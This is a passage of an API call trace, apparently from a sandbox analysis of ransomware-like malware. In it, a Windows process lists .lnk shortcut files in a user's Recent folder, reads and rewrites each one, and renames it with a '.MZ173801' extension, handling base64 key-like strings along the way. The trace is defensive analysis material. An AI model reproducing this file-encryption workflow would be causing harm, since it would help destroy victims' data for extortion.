lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.538] GetCurrentThreadId () returned 0x1358 [0106.538] GetCurrentThreadId () returned 0x1358 [0106.538] GetCurrentThreadId () returned 0x1358 [0106.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.539] GetCurrentThreadId () returned 0x1358 [0106.539] GetCurrentThreadId () returned 0x1358 [0106.539] GetCurrentThreadId () returned 0x1358 [0106.539] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0VlS.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\0vls.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.539] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.539] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.539] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4fd [0106.539] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.539] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x4fd, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x4fd, lpOverlapped=0x0) returned 1 [0106.540] CloseHandle (hObject=0x3f4) returned 1 [0106.540] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0VlS.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\0vls.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.541] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x4fd, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x4fd, lpOverlapped=0x0) returned 1 [0106.542] CloseHandle (hObject=0x3f4) returned 1 [0106.543] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0VlS.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\0vls.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0VlS.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\0vls.lnk.mz173801")) returned 1 [0106.544] GetCurrentThreadId () returned 0x1358 [0106.544] GetCurrentThreadId () returned 0x1358 [0106.544] GetCurrentThreadId () returned 0x1358 [0106.544] GetCurrentThreadId () returned 0x1358 [0106.544] GetCurrentThreadId () returned 0x1358 [0106.544] GetCurrentThreadId () returned 0x1358 [0106.544] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea33ce68, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x88bbf03a, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x88bbf03a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x418, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="1Zion8xjlGTdeA8sDujv.lnk", cAlternateFileName="1ZION8~1.LNK")) returned 1 [0106.544] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.544] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.544] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1Zion8xjlGTdeA8sDujv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\1zion8xjlgtdea8sdujv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea33ce68, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x88bbf03a, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x88bbf03a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x418)) returned 1 [0106.544] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.544] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.545] GetCurrentThreadId () returned 0x1358 [0106.545] GetCurrentThreadId () returned 0x1358 [0106.545] GetCurrentThreadId () returned 0x1358 [0106.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.545] GetCurrentThreadId () returned 0x1358 [0106.545] GetCurrentThreadId () returned 0x1358 [0106.545] GetCurrentThreadId () returned 0x1358 [0106.545] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1Zion8xjlGTdeA8sDujv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\1zion8xjlgtdea8sdujv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.546] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.546] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.546] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x418 [0106.546] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.546] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x418, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x418, lpOverlapped=0x0) returned 1 [0106.547] CloseHandle (hObject=0x3f4) returned 1 [0106.547] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1Zion8xjlGTdeA8sDujv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\1zion8xjlgtdea8sdujv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.548] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x418, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x418, lpOverlapped=0x0) returned 1 [0106.549] CloseHandle (hObject=0x3f4) returned 1 [0106.550] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1Zion8xjlGTdeA8sDujv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\1zion8xjlgtdea8sdujv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1Zion8xjlGTdeA8sDujv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\1zion8xjlgtdea8sdujv.lnk.mz173801")) returned 1 [0106.550] GetCurrentThreadId () returned 0x1358 [0106.550] GetCurrentThreadId () returned 0x1358 [0106.550] GetCurrentThreadId () returned 0x1358 [0106.550] GetCurrentThreadId () returned 0x1358 [0106.550] GetCurrentThreadId () returned 0x1358 [0106.550] GetCurrentThreadId () returned 0x1358 [0106.550] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5eb967, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea5eb967, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea5eb967, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3c6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="28RvPNiENM.lnk", cAlternateFileName="28RVPN~1.LNK")) returned 1 [0106.550] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.550] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.550] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\28RvPNiENM.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\28rvpnienm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5eb967, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea5eb967, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea5eb967, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3c6)) returned 1 [0106.551] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 